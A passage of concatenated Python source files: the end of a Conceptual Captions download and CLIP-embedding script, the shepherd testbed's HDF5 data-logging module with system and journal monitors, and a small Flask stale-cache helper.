# print(f'INSIDE = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, recover_index)
recover_index = 1 - recover_index
# print(f'OUTSIDE = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, 2)
return 0
def download_conceptual(conceptual_root: str, num_threads: int, num_images: int):
urls = []
for suffix in ( "train", "val"):
if suffix == "train":
training_path = f"{conceptual_root}/Train_GCC-training.tsv"
with open(training_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
train_sub_set_path = f'{conceptual_root}/subset_Train_GCC-training.tsv'
if not os.path.exists(train_sub_set_path):
myfile = Path(train_sub_set_path)
myfile.touch(exist_ok=True)
with open(train_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = train_sub_set_path
else:
val_path = f'{conceptual_root}/Validation_GCC-1.1.0-Validation.tsv'
with open(val_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
val_sub_set_path = f'{conceptual_root}/subset_Val_GCC-training.tsv'
if not os.path.exists(val_sub_set_path):
myfile = Path(val_sub_set_path)
myfile.touch(exist_ok=True)
with open(val_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = val_sub_set_path
with open(tsv_path) as f:
read_tsv = csv.reader(f, delimiter="\t")
for i, row in enumerate(read_tsv):
urls.append((row, i))
progress = tqdm(total=len(urls))
if num_threads == 1:
thread(urls, 0, progress, None, suffix, conceptual_root)
else:
groups = []
threads = []
lock = threading.Lock()
split_size = len(urls) // num_threads
for i in range(num_threads):
if i < num_threads - 1:
groups.append(urls[i * split_size: (i + 1) * split_size])
else:
groups.append(urls[i * split_size:])
for i in range(num_threads):
threads.append(threading.Thread(target=thread, args=(groups[i], i, progress, lock, suffix, conceptual_root)))
for i in range(num_threads):
threads[i].start()
for i in range(num_threads):
threads[i].join()
progress.close()
def add_period(caption: str):
caption = caption.strip()
if caption[-1] != '.':
caption = caption + '.'
elif caption[-2] == ' ':
caption = caption[:-2] + '.'
return caption
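# Behaviour of add_period() for a non-empty caption, for example:
#   add_period("a dog on a beach")   -> "a dog on a beach."
#   add_period("a dog on a beach .") -> "a dog on a beach."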
def create_clip_embeddings(conceptual_root: str, clip_model_type: str):
all_embeddings = []
all_captions = []
for suffix in ("train", "val"):
clip_model, preprocess = clip.load(clip_model_type, device=device, jit=False)
clip_model = clip_model.eval()
ds = ConceptualDS(conceptual_root, preprocess, suffix)
dl = DataLoader(ds, batch_size=2, shuffle=False, drop_last=False)
progress = tqdm(total=len(dl))
counter = 0
clip_model_name = clip_model_type.replace('/', '_')
out_data_path = f"{conceptual_root}/conceptual_clip_{clip_model_name}_{suffix}.pkl"
recover_index = 0
for i, data in enumerate(dl):
images, captions, image_names = data
images = images.to(device)
with torch.no_grad():
prefix = clip_model.encode_image(images).to(device)
# print(f'prefix.shape = {prefix.shape}')
is_valid = list(map(lambda x: x != "", captions))
mask = torch.tensor(is_valid)
all_embeddings.append(prefix[mask])
captions = [caption for j, caption in enumerate(captions) if is_valid[j]]
image_names = [image_name for j, image_name in enumerate(image_names) if is_valid[j]]
all_captions.extend([{"caption": add_period(caption), "clip_embedding": counter + j, "image_id": image_name}
for j, (caption, image_name) in enumerate(zip(captions, image_names))])
progress.update()
counter += len(captions)
if (i + 1) % 1000 == 0:
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, recover_index)
recover_index = 1 - recover_index
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, 2)
progress.close()
return 0
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', default='./data/conceptual')
parser.add_argument('--clip_model_type', default="ViT-B/32", choices=('RN50', 'RN101', 'RN50x4', 'ViT-B/32'))
parser.add_argument('--num_threads', type=int, default=1)
args = parser.parse_args()
download_conceptual(args.data_root, args.num_threads, 100)
create_clip_embeddings(args.data_root, args.clip_model_type)
if __name__ == '__main__':
main()
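# Usage sketch (illustrative only, paths and values are placeholders): with the
# Conceptual Captions TSV files placed under --data_root and the train/ and val/
# sub-directories created beforehand (the script does not create them and
# silently skips failed downloads), running
#
#   python parse_conceptual.py --data_root ./data/conceptual --clip_model_type ViT-B/32 --num_threads 2
#
# downloads up to 100 train and 100 val images (the cap hard-coded in main())
# and writes conceptual_clip_ViT-B_32_{train,val}.pkl, each containing
# {"clip_embedding": Tensor, "captions": [{"caption", "clip_embedding", "image_id"}, ...]}.
# Note that get_all_data() above only collects the pickles of thread ids 0 and 1,
# so using more than two download threads would leave data out of the embedding step.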
|
datalog.py
|
# -*- coding: utf-8 -*-
"""
shepherd.datalog
~~~~~
Provides classes for storing and retrieving sampled IV data to/from
HDF5 files.
:copyright: (c) 2019 Networked Embedded Systems Lab, TU Dresden.
:license: MIT, see LICENSE for more details.
"""
import logging
import subprocess
import threading
import time
from typing import NoReturn, Union
import numpy as np
from pathlib import Path
import h5py
from itertools import product
from collections import namedtuple
import psutil as psutil
import serial
import yaml
from shepherd.calibration import CalibrationData
from shepherd.calibration import cal_channel_harvest_dict
from shepherd.calibration import cal_channel_emulation_dict
from shepherd.calibration import cal_parameter_list
from shepherd.shepherd_io import DataBuffer
from shepherd.commons import GPIO_LOG_BIT_POSITIONS, MAX_GPIO_EVT_PER_BUFFER
logger = logging.getLogger(__name__)
"""
An entry for an exception to be stored together with the data consists of a
timestamp, a custom message and an arbitrary integer value
"""
ExceptionRecord = namedtuple(
"ExceptionRecord", ["timestamp", "message", "value"]
)
monitors_end = threading.Event()
def unique_path(base_path: Union[str, Path], suffix: str):
counter = 0
while True:
path = base_path.with_suffix(f".{ counter }{ suffix }")
if not path.exists():
return path
counter += 1
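# e.g. unique_path(Path("/var/shepherd/rec"), ".h5") yields /var/shepherd/rec.0.h5,
# then /var/shepherd/rec.1.h5 if that exists, and so on (path is illustrative only)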
def add_dataset_time(grp: h5py.Group, length: int, chunks: Union[bool, tuple] = True) -> NoReturn:
grp.create_dataset(
"time",
(length,),
dtype="u8",
maxshape=(None,),
chunks=chunks,
compression=LogWriter.compression_algo,
)
grp["time"].attrs["unit"] = f"ns"
grp["time"].attrs["description"] = "system time [ns]"
class LogWriter(object):
"""Stores data coming from PRU's in HDF5 format
Args:
store_path (Path): Name of the HDF5 file that data will be written to
calibration_data (CalibrationData): Data is written as raw ADC
values. We need calibration data in order to convert to physical
units later.
mode (str): Indicates if this is data from recording or emulation
force_overwrite (bool): Overwrite existing file with the same name
samples_per_buffer (int): Number of samples contained in a single
shepherd buffer
        samplerate_sps (int): Sampling rate of the recorded IV data in
            samples per second
"""
# choose lossless compression filter
# - gzip: good compression, moderate speed, select level from 1-9, default is 4
# - lzf: low to moderate compression, very fast, no options -> 20 % overhead for half the filesize
# NOTE for quick and easy performance improvement: remove compression for monitor-datasets, or even group_value
compression_algo = "lzf"
sys_log_intervall_ns = 1 * (10 ** 9) # step-size is 1 s
sys_log_next_ns = 0
dmesg_mon_t = None
ptp4l_mon_t = None
uart_mon_t = None
def __init__(
self,
store_path: Path,
calibration_data: CalibrationData,
mode: str = "harvesting",
force_overwrite: bool = False,
samples_per_buffer: int = 10_000,
samplerate_sps: int = 100_000,
skip_voltage: bool = False,
skip_current: bool = False,
skip_gpio: bool = False,
):
if force_overwrite or not store_path.exists():
self.store_path = store_path
logger.info(f"Storing data to '{self.store_path}'")
else:
base_dir = store_path.resolve().parents[0]
self.store_path = unique_path(
base_dir / store_path.stem, store_path.suffix
)
logger.warning(
f"File {store_path} already exists.. "
f"storing under {self.store_path} instead"
)
# Refer to shepherd/calibration.py for the format of calibration data
self.mode = mode
self.calibration_data = calibration_data
self.chunk_shape = (samples_per_buffer,)
self.samplerate_sps = int(samplerate_sps)
self.sample_interval_ns = int(10**9 // samplerate_sps)
self.buffer_timeseries = self.sample_interval_ns * np.arange(samples_per_buffer).astype("u8")
self._write_voltage = not skip_voltage
self._write_current = not skip_current
self._write_gpio = (not skip_gpio) and ("emulat" in mode)
logger.debug(f"Set log-writing for voltage: {'enabled' if self._write_voltage else 'disabled'}")
logger.debug(f"Set log-writing for current: {'enabled' if self._write_current else 'disabled'}")
logger.debug(f"Set log-writing for gpio: {'enabled' if self._write_gpio else 'disabled'}")
# initial sysutil-reading and delta-history
self.sysutil_io_last = np.array(psutil.disk_io_counters()[0:4])
self.sysutil_nw_last = np.array(psutil.net_io_counters()[0:2])
        # Optimization: allow larger, more efficient resizes (previously .resize() was called per element)
# h5py v3.4 is taking 20% longer for .write_buffer() than v2.1
# this change speeds up v3.4 by 30% (even system load drops from 90% to 70%), v2.1 by 16%
inc_duration = int(100)
inc_length = int(inc_duration * samplerate_sps)
self.data_pos = 0
self.data_inc = inc_length
self.gpio_pos = 0
self.gpio_inc = MAX_GPIO_EVT_PER_BUFFER
self.sysutil_pos = 0
self.sysutil_inc = inc_duration
self.uart_pos = 0
self.uart_inc = 100
self.dmesg_pos = 0
self.dmesg_inc = 100
self.xcpt_pos = 0
self.xcpt_inc = 100
self.timesync_pos = 0
self.timesync_inc = inc_duration
# NOTE for possible optimization: align resize with chunk-size -> rely on autochunking -> inc = h5ds.chunks
def __enter__(self):
"""Initializes the structure of the HDF5 file
HDF5 is hierarchically structured and before writing data, we have to
setup this structure, i.e. creating the right groups with corresponding
data types. We will store 3 types of data in a LogWriter database: The
actual IV samples recorded either from the harvester (during recording)
or the target (during emulation). Any log messages, that can be used to
store relevant events or tag some parts of the recorded data. And lastly
the state of the GPIO pins.
"""
self._h5file = h5py.File(self.store_path, "w")
# show key parameters for h5-performance
settings = list(self._h5file.id.get_access_plist().get_cache())
logger.debug(f"H5Py Cache_setting={settings} (_mdc, _nslots, _nbytes, _w0)")
        # Store the mode in order to allow the user to differentiate harvesting vs emulation data
self._h5file.attrs["mode"] = self.mode # TODO: should be part of data-group
# Store voltage and current samples in the data group, both are stored as 4 Byte unsigned int
self.data_grp = self._h5file.create_group("data")
# the size of window_samples-attribute in harvest-data indicates ivcurves as input -> emulator uses virtual-harvester
self.data_grp.attrs["window_samples"] = 0 # will be adjusted by .embed_config()
add_dataset_time(self.data_grp, self.data_inc, self.chunk_shape)
self.data_grp.create_dataset(
"current",
(self.data_inc,),
dtype="u4",
maxshape=(None,),
chunks=self.chunk_shape,
compression=self.compression_algo,
)
self.data_grp["current"].attrs["unit"] = "A"
self.data_grp["current"].attrs["description"] = "current [A] = value * gain + offset"
self.data_grp.create_dataset(
"voltage",
(self.data_inc,),
dtype="u4",
maxshape=(None,),
chunks=self.chunk_shape,
compression=LogWriter.compression_algo,
)
self.data_grp["voltage"].attrs["unit"] = "V"
self.data_grp["voltage"].attrs["description"] = "voltage [V] = value * gain + offset"
for channel, parameter in product(["current", "voltage"], cal_parameter_list):
# TODO: not the cleanest cal-selection, maybe just hand the resulting two and rename them already to "current, voltage" in calling FN
cal_channel = cal_channel_harvest_dict[channel] if (self.mode == "harvesting") else cal_channel_emulation_dict[channel]
self.data_grp[channel].attrs[parameter] = self.calibration_data[self.mode][cal_channel][parameter]
# Create group for gpio data
self.gpio_grp = self._h5file.create_group("gpio")
add_dataset_time(self.gpio_grp, self.gpio_inc)
self.gpio_grp.create_dataset(
"value",
(self.gpio_inc,),
dtype="u2",
maxshape=(None,),
chunks=True,
compression=LogWriter.compression_algo,
)
self.gpio_grp["value"].attrs["unit"] = "n"
self.gpio_grp["value"].attrs["description"] = GPIO_LOG_BIT_POSITIONS
# Create group for exception logs, entry consists of a timestamp, a message and a value
self.xcpt_grp = self._h5file.create_group("exceptions")
add_dataset_time(self.xcpt_grp, self.xcpt_inc)
self.xcpt_grp.create_dataset(
"message",
(self.xcpt_inc,),
dtype=h5py.special_dtype(vlen=str), # TODO: switch to string_dtype() (h5py >v3.0)
maxshape=(None,),
chunks=True,
)
self.xcpt_grp.create_dataset("value", (self.xcpt_inc,), dtype="u4", maxshape=(None,), chunks=True)
self.xcpt_grp["value"].attrs["unit"] = "n"
# UART-Logger
self.uart_grp = self._h5file.create_group("uart")
add_dataset_time(self.uart_grp, self.uart_inc)
# Every log entry consists of a timestamp and a message
self.uart_grp.create_dataset(
"message",
(self.uart_inc,),
dtype=h5py.special_dtype(vlen=bytes),
maxshape=(None,),
chunks=True,
)
self.uart_grp["message"].attrs["description"] = f"raw ascii-bytes"
# Create sys-Logger
self.sysutil_grp = self._h5file.create_group("sysutil")
add_dataset_time(self.sysutil_grp, self.sysutil_inc, (self.sysutil_inc,))
self.sysutil_grp["time"].attrs["unit"] = "ns"
self.sysutil_grp["time"].attrs["description"] = "system time [ns]"
self.sysutil_grp.create_dataset("cpu", (self.sysutil_inc,), dtype="u1", maxshape=(None,), chunks=(self.sysutil_inc,), )
self.sysutil_grp["cpu"].attrs["unit"] = "%"
self.sysutil_grp["cpu"].attrs["description"] = "cpu_util [%]"
self.sysutil_grp.create_dataset("ram", (self.sysutil_inc, 2), dtype="u1", maxshape=(None, 2), chunks=(self.sysutil_inc, 2), )
self.sysutil_grp["ram"].attrs["unit"] = "%"
self.sysutil_grp["ram"].attrs["description"] = "ram_available [%], ram_used [%]"
self.sysutil_grp.create_dataset("io", (self.sysutil_inc, 4), dtype="u8", maxshape=(None, 4), chunks=(self.sysutil_inc, 4), )
self.sysutil_grp["io"].attrs["unit"] = "n"
self.sysutil_grp["io"].attrs["description"] = "io_read [n], io_write [n], io_read [byte], io_write [byte]"
self.sysutil_grp.create_dataset("net", (self.sysutil_inc, 2), dtype="u8", maxshape=(None, 2), chunks=(self.sysutil_inc, 2), )
self.sysutil_grp["net"].attrs["unit"] = "n"
self.sysutil_grp["net"].attrs["description"] = "nw_sent [byte], nw_recv [byte]"
self.sys_log_next_ns = int(time.time()) * (10 ** 9)
self.log_sys_stats()
# Create dmesg-Logger -> consists of a timestamp and a message
self.dmesg_grp = self._h5file.create_group("dmesg")
add_dataset_time(self.dmesg_grp, self.dmesg_inc)
self.dmesg_grp.create_dataset(
"message",
(self.dmesg_inc,),
dtype=h5py.special_dtype(vlen=str),
maxshape=(None,),
chunks=True,
)
# Create timesync-Logger
self.timesync_grp = self._h5file.create_group("timesync")
add_dataset_time(self.timesync_grp, self.timesync_inc)
self.timesync_grp.create_dataset("value", (self.timesync_inc, 3), dtype="i8", maxshape=(None, 3), chunks=True)
self.timesync_grp["value"].attrs["unit"] = "ns, Hz, ns"
self.timesync_grp["value"].attrs["description"] = "master offset [ns], s2 freq [Hz], path delay [ns]"
return self
def embed_config(self, data: dict) -> NoReturn:
"""
Important Step to get a self-describing Output-File
Note: the size of window_samples-attribute in harvest-data indicates ivcurves as input -> emulator uses virtual-harvester
:param data: from virtual harvester or converter / source
:return: None
"""
self.data_grp.attrs["config"] = yaml.dump(data, default_flow_style=False)
if "window_samples" in data:
self.data_grp.attrs["window_samples"] = data["window_samples"]
def __exit__(self, *exc):
global monitors_end
monitors_end.set()
time.sleep(0.1)
# meantime: trim over-provisioned parts
self.data_grp["time"].resize((self.data_pos if self._write_current or self._write_voltage else 0,))
self.data_grp["voltage"].resize((self.data_pos if self._write_voltage else 0,))
self.data_grp["current"].resize((self.data_pos if self._write_current else 0,))
self.gpio_grp["time"].resize((self.gpio_pos if self._write_gpio else 0,))
self.gpio_grp["value"].resize((self.gpio_pos if self._write_gpio else 0,))
self.sysutil_grp["time"].resize((self.sysutil_pos,))
self.sysutil_grp["cpu"].resize((self.sysutil_pos,))
self.sysutil_grp["ram"].resize((self.sysutil_pos, 2))
self.sysutil_grp["io"].resize((self.sysutil_pos, 4))
self.sysutil_grp["net"].resize((self.sysutil_pos, 2))
self.uart_grp["time"].resize((self.uart_pos,))
self.uart_grp["message"].resize((self.uart_pos,))
self.dmesg_grp["time"].resize((self.dmesg_pos,))
self.dmesg_grp["message"].resize((self.dmesg_pos,))
self.xcpt_grp["time"].resize((self.xcpt_pos,))
self.xcpt_grp["message"].resize((self.xcpt_pos,))
self.xcpt_grp["value"].resize((self.xcpt_pos,))
self.timesync_grp["time"].resize((self.timesync_pos,))
self.timesync_grp["value"].resize((self.timesync_pos, 3))
if self.dmesg_mon_t is not None:
logger.info(f"[LogWriter] terminate Dmesg-Monitor ({self.dmesg_grp['time'].shape[0]} entries)")
self.dmesg_mon_t = None
if self.ptp4l_mon_t is not None:
logger.info(f"[LogWriter] terminate PTP4L-Monitor ({self.timesync_grp['time'].shape[0]} entries)")
self.ptp4l_mon_t = None
if self.uart_mon_t is not None:
logger.info(f"[LogWriter] terminate UART-Monitor ({self.uart_grp['time'].shape[0]} entries)")
self.uart_mon_t = None
        runtime = round(self.data_grp['time'].shape[0] / self.samplerate_sps, 1)
logger.info(f"[LogWriter] flushing hdf5 file ({runtime} s iv-data, {self.gpio_grp['time'].shape[0]} gpio-events)")
self._h5file.flush()
logger.info("[LogWriter] closing hdf5 file")
self._h5file.close()
def write_buffer(self, buffer: DataBuffer) -> NoReturn:
"""Writes data from buffer to file.
Args:
buffer (DataBuffer): Buffer containing IV data
"""
# First, we have to resize the corresponding datasets
data_end_pos = self.data_pos + len(buffer)
data_length = self.data_grp["time"].shape[0]
if data_end_pos >= data_length:
data_length += self.data_inc
self.data_grp["time"].resize((data_length,))
self.data_grp["voltage"].resize((data_length if self._write_voltage else 0,))
self.data_grp["current"].resize((data_length if self._write_current else 0,))
if self._write_voltage:
self.data_grp["voltage"][self.data_pos:data_end_pos] = buffer.voltage
if self._write_current:
self.data_grp["current"][self.data_pos:data_end_pos] = buffer.current
if self._write_voltage or self._write_current:
self.data_grp["time"][self.data_pos:data_end_pos] = (
self.buffer_timeseries + buffer.timestamp_ns
)
self.data_pos = data_end_pos
len_edges = len(buffer.gpio_edges)
if self._write_gpio and (len_edges > 0):
gpio_new_pos = self.gpio_pos + len_edges
data_length = self.gpio_grp["time"].shape[0]
if gpio_new_pos >= data_length:
data_length += self.gpio_inc
self.gpio_grp["time"].resize((data_length,))
self.gpio_grp["value"].resize((data_length,))
self.gpio_grp["time"][self.gpio_pos:gpio_new_pos] = buffer.gpio_edges.timestamps_ns
self.gpio_grp["value"][self.gpio_pos:gpio_new_pos] = buffer.gpio_edges.values
self.gpio_pos = gpio_new_pos
self.log_sys_stats()
def write_exception(self, exception: ExceptionRecord) -> NoReturn:
""" Writes an exception to the hdf5 file.
TODO: use this fn to log exceptions, redirect logger.error() ?
TODO: there is a concrete ShepherdIOException(Exception)
Args:
exception (ExceptionRecord): The exception to be logged
"""
if self.xcpt_pos >= self.xcpt_grp["time"].shape[0]:
data_length = self.xcpt_grp["time"].shape[0] + self.xcpt_inc
self.xcpt_grp["time"].resize((data_length,))
self.xcpt_grp["value"].resize((data_length,))
self.xcpt_grp["message"].resize((data_length,))
self.xcpt_grp["time"][self.xcpt_pos] = exception.timestamp
self.xcpt_grp["value"][self.xcpt_pos] = exception.value
self.xcpt_grp["message"][self.xcpt_pos] = exception.message
self.xcpt_pos += 1
def log_sys_stats(self) -> NoReturn:
""" captures state of system in a fixed intervall
https://psutil.readthedocs.io/en/latest/#cpu
:return: none
"""
ts_now_ns = int(time.time() * (10 ** 9))
if ts_now_ns >= self.sys_log_next_ns:
data_length = self.sysutil_grp["time"].shape[0]
if self.sysutil_pos >= data_length:
# self._h5file.flush()
# logger.info(f"flushed output-file @ {data_length} s")
data_length += self.sysutil_inc
self.sysutil_grp["time"].resize((data_length,))
self.sysutil_grp["cpu"].resize((data_length,))
self.sysutil_grp["ram"].resize((data_length, 2))
self.sysutil_grp["io"].resize((data_length, 4))
self.sysutil_grp["net"].resize((data_length, 2))
self.sys_log_next_ns += self.sys_log_intervall_ns
if self.sys_log_next_ns < ts_now_ns:
self.sys_log_next_ns = int(time.time()) * (10 ** 9)
self.sysutil_grp["time"][self.sysutil_pos] = ts_now_ns
self.sysutil_grp["cpu"][self.sysutil_pos] = int(round(psutil.cpu_percent(0)))
mem_stat = psutil.virtual_memory()[0:3]
self.sysutil_grp["ram"][self.sysutil_pos, 0:2] = [int(100 * mem_stat[1] / mem_stat[0]), int(mem_stat[2])]
sysutil_io_now = np.array(psutil.disk_io_counters()[0:4])
self.sysutil_grp["io"][self.sysutil_pos, :] = sysutil_io_now - self.sysutil_io_last
self.sysutil_io_last = sysutil_io_now
sysutil_nw_now = np.array(psutil.net_io_counters()[0:2])
self.sysutil_grp["net"][self.sysutil_pos, :] = sysutil_nw_now - self.sysutil_nw_last
self.sysutil_nw_last = sysutil_nw_now
self.sysutil_pos += 1
# TODO: add temp, not working: https://psutil.readthedocs.io/en/latest/#psutil.sensors_temperatures
def start_monitors(self, uart_baudrate: int = 0) -> NoReturn:
self.dmesg_mon_t = threading.Thread(target=self.monitor_dmesg, daemon=True)
self.dmesg_mon_t.start()
self.ptp4l_mon_t = threading.Thread(target=self.monitor_ptp4l, daemon=True)
self.ptp4l_mon_t.start()
self.uart_mon_t = threading.Thread(target=self.monitor_uart, args=(uart_baudrate,), daemon=True)
self.uart_mon_t.start()
def monitor_uart(self, baudrate: int, poll_intervall: float = 0.01) -> NoReturn:
# TODO: TEST - Not final, goal: raw bytes in hdf5
# - uart is bytes-type -> storing in hdf5 is hard, tried 'S' and opaque-type -> failed with errors
# - converting is producing ValueError on certain chars, errors="backslashreplace" does not help
# TODO: evaluate https://pyserial.readthedocs.io/en/latest/pyserial_api.html#serial.to_bytes
if not isinstance(baudrate, int) or baudrate == 0:
return
global monitors_end
uart_path = '/dev/ttyO1'
logger.debug(f"Will start UART-Monitor for target on '{uart_path}' @ {baudrate} baud")
tevent = threading.Event()
try:
# open serial as non-exclusive
with serial.Serial(uart_path, baudrate, timeout=0) as uart:
while True:
if monitors_end.is_set():
break
if uart.in_waiting > 0:
output = uart.read(uart.in_waiting).decode("ascii", errors="replace").replace('\x00', '')
if len(output) > 0:
data_length = self.uart_grp["time"].shape[0]
                            if self.uart_pos >= data_length:
data_length += self.uart_inc
self.uart_grp["time"].resize((data_length,))
self.uart_grp["message"].resize((data_length,))
self.uart_grp["time"][self.uart_pos] = int(time.time()) * (10 ** 9)
self.uart_grp["message"][self.uart_pos] = output # np.void(uart_rx)
self.uart_pos += 1
tevent.wait(poll_intervall) # rate limiter
except ValueError as e:
logger.error(
f"[UartMonitor] PySerial ValueError '{e}' - couldn't configure serial-port '{uart_path}' with baudrate={baudrate} -> will skip logging")
except serial.SerialException as e:
logger.error(
f"[UartMonitor] pySerial SerialException '{e} - Couldn't open Serial-Port '{uart_path}' to target -> will skip logging")
logger.debug(f"[UartMonitor] ended itself")
def monitor_dmesg(self, backlog: int = 40, poll_intervall: float = 0.1):
# var1: ['dmesg', '--follow'] -> not enough control
global monitors_end
cmd_dmesg = ['sudo', 'journalctl', '--dmesg', '--follow', f'--lines={backlog}', '--output=short-precise']
proc_dmesg = subprocess.Popen(cmd_dmesg, stdout=subprocess.PIPE, universal_newlines=True)
tevent = threading.Event()
for line in iter(proc_dmesg.stdout.readline, ""):
if monitors_end.is_set():
break
line = str(line).strip()[:128]
try:
data_length = self.dmesg_grp["time"].shape[0]
if self.dmesg_pos >= data_length:
data_length += self.dmesg_inc
self.dmesg_grp["time"].resize((data_length,))
self.dmesg_grp["message"].resize((data_length,))
self.dmesg_grp["time"][self.dmesg_pos] = int(time.time() * (10 ** 9))
self.dmesg_grp["message"][self.dmesg_pos] = line
except OSError:
logger.error(f"[DmesgMonitor] Caught a Write Error for Line: [{type(line)}] {line}")
tevent.wait(poll_intervall) # rate limiter
logger.debug(f"[DmesgMonitor] ended itself")
def monitor_ptp4l(self, poll_intervall: float = 0.25):
# example: Feb 16 10:58:37 sheep1 ptp4l[378]: [821.629] master offset -4426 s2 freq +285889 path delay 12484
global monitors_end
cmd_ptp4l = ['sudo', 'journalctl', '--unit=ptp4l', '--follow', '--lines=1', '--output=short-precise'] # for client
proc_ptp4l = subprocess.Popen(cmd_ptp4l, stdout=subprocess.PIPE, universal_newlines=True)
tevent = threading.Event()
for line in iter(proc_ptp4l.stdout.readline, ""):
            if monitors_end.is_set():
break
try:
words = str(line).split()
i_start = words.index("offset")
values = [int(words[i_start + 1]), int(words[i_start + 4]), int(words[i_start + 7])]
except ValueError:
continue
try:
data_length = self.timesync_grp["time"].shape[0]
                if self.timesync_pos >= data_length:
                    data_length += self.timesync_inc
                    self.timesync_grp["time"].resize((data_length,))
                    self.timesync_grp["value"].resize((data_length, 3))
                self.timesync_grp["time"][self.timesync_pos] = int(time.time() * (10 ** 9))
                self.timesync_grp["value"][self.timesync_pos, :] = values[0:3]
                self.timesync_pos += 1
except OSError:
logger.error(f"[PTP4lMonitor] Caught a Write Error for Line: [{type(line)}] {line}")
tevent.wait(poll_intervall) # rate limiter
logger.debug(f"[PTP4lMonitor] ended itself")
def __setitem__(self, key, item):
"""Offer a convenient interface to store any relevant key-value data"""
return self._h5file.attrs.__setitem__(key, item)
class LogReader(object):
""" Sequentially Reads data from HDF5 file.
Args:
store_path (Path): Path of hdf5 file containing IV data
samples_per_buffer (int): Number of IV samples per buffer
"""
def __init__(self,
store_path: Path,
samples_per_buffer: int = 10_000,
samplerate_sps: int = 100_000):
self.store_path = store_path
self.samples_per_buffer = samples_per_buffer
self.samplerate_sps = samplerate_sps
def __enter__(self):
self._h5file = h5py.File(self.store_path, "r")
self.ds_voltage = self._h5file["data"]["voltage"]
self.ds_current = self._h5file["data"]["current"]
runtime = round(self.ds_voltage.shape[0] / self.samplerate_sps, 1)
logger.info(f"Reading data from '{self.store_path}', contains {runtime} s")
return self
def __exit__(self, *exc):
self._h5file.close()
def read_buffers(self, start: int = 0, end: int = None, verbose: bool = False):
"""Reads the specified range of buffers from the hdf5 file.
Args:
:param start: (int): Index of first buffer to be read
:param end: (int): Index of last buffer to be read
            :param verbose: (bool) when False, skips the per-block timing and debug logging in this performance-critical loop
Yields:
Buffers between start and end
"""
if end is None:
end = int(
self._h5file["data"]["time"].shape[0] / self.samples_per_buffer
)
logger.debug(f"Reading blocks from { start } to { end } from source-file")
for i in range(start, end):
if verbose:
ts_start = time.time()
idx_start = i * self.samples_per_buffer
idx_end = idx_start + self.samples_per_buffer
db = DataBuffer(
voltage=self.ds_voltage[idx_start:idx_end],
current=self.ds_current[idx_start:idx_end],
)
if verbose:
logger.debug(
f"Reading datablock with {self.samples_per_buffer} samples "
f"from file took { round(1e3 * (time.time()-ts_start), 2) } ms"
)
yield db
def get_calibration_data(self) -> CalibrationData:
"""Reads calibration data from hdf5 file.
Returns:
Calibration data as CalibrationData object
"""
cal = CalibrationData.from_default()
for channel, parameter in product(["current", "voltage"], cal_parameter_list):
cal_channel = cal_channel_harvest_dict[channel]
cal.data["harvesting"][cal_channel][parameter] = self._h5file["data"][channel].attrs[parameter]
return CalibrationData(cal)
def get_window_samples(self) -> int:
if "window_samples" in self._h5file["data"].attrs:
return self._h5file["data"].attrs["window_samples"]
return 0
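# Minimal usage sketch (illustrative only; buffer_source() and process() are
# hypothetical stand-ins for the PRU buffer producer and a consumer):
#
#   cal = CalibrationData.from_default()
#   with LogWriter(Path("rec.h5"), cal, mode="harvesting") as log:
#       log.embed_config({"window_samples": 0})
#       log.start_monitors()
#       for buf in buffer_source():
#           log.write_buffer(buf)
#
#   with LogReader(Path("rec.h5")) as reader:
#       for buf in reader.read_buffers(verbose=True):
#           process(buf)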
|
cachy.py
|
import cachetools, cachetools.func, time, threading, traceback
from flaskthreads import AppContextThread
from flaskthreads.thread_helpers import has_app_context, _app_ctx_stack, APP_CONTEXT_ERROR
from flask import g
import concurrent.futures
from concurrent.futures.thread import _threads_queues
import functools
def get_context(): return _app_ctx_stack.top if has_app_context() else None
class TPEMod(concurrent.futures.ThreadPoolExecutor):
def submit(self, fn, *a, **kw):
context = get_context()
def fnwrapper(*aa, **akw):
if context:
with context:
return fn(*aa, **akw)
else:
return fn(*aa, **akw)
res = super().submit(fnwrapper, *a, **kw)
_threads_queues.clear() # hack to stop joining from preventing ctrl-c
return res
tpe = TPEMod(max_workers=256)
class AppContextThreadMod(threading.Thread):
"""Implements Thread with flask AppContext."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.app_ctx = get_context()
def run(self):
if self.app_ctx:
with self.app_ctx:
super().run()
else:
super().run()
Thread = AppContextThreadMod
# hashkey = cachetools.keys.hashkey
tm = time.monotonic
empty = 0
idle = 1
dispatching = 2
import time, random
ts = time.sleep
rr = random.random
def tsr():ts(rr()*.1)
# buffer that refreshes in the bkgnd
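# Three states are used below: `empty` (nothing cached yet, the first caller
# computes synchronously), `idle` (a value is cached; it is served as-is while
# younger than ttr, refreshed in a background thread once older than ttr, and
# recomputed synchronously once older than ttl) and `dispatching` (a background
# refresh is in flight, so the stale value keeps being served until it lands).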
class StaleBuffer:
# f returns what we want to serve
def __init__(self, f, ttr=5, ttl=10): # time to refresh / time to live
self.a = None
self.ts = tm()
self.l = threading.Lock()
self.state = empty
self.f = f
self.ttr = ttr
self.ttl = ttl
assert ttl>ttr
def refresh_threaded(self):
# tsr()
try:
r = self.f()
except Exception as e:
traceback.print_exc()
with self.l:
self.state = idle
else:
with self.l:
self.state = idle
self.a = r
self.ts = tm()
def dispatch_refresh(self):
tpe.submit(self.refresh_threaded)
# t = Thread(target=self.refresh_threaded, daemon=True)
# t.start()
def get(self):
# ttl = self.ttl
# ttr = self.ttr
# f = self.f
# last = self.ts
# now = tm()
# past = now - last
past = tm() - self.ts
state = self.state
        # we can't afford expensive locking every time, so
if state==idle and past < self.ttr:
return self.a
elif state==dispatching:
return self.a
else:
with self.l:
# cache is empty
if state == empty:
self.a = self.f()
self.ts = tm()
self.state = idle
# cache is not empty, no dispatch on the way
elif state == idle:
# is cache fresh?
if past > self.ttl:
# too old.
self.a = self.f()
self.ts = tm()
elif past > self.ttr:
# kinda old
self.state = dispatching
self.dispatch_refresh()
# # cache is fresh
# else:
# pass
# elif self.state == 'dispatching':
# pass
# else:
# pass
return self.a
tmg = tm()
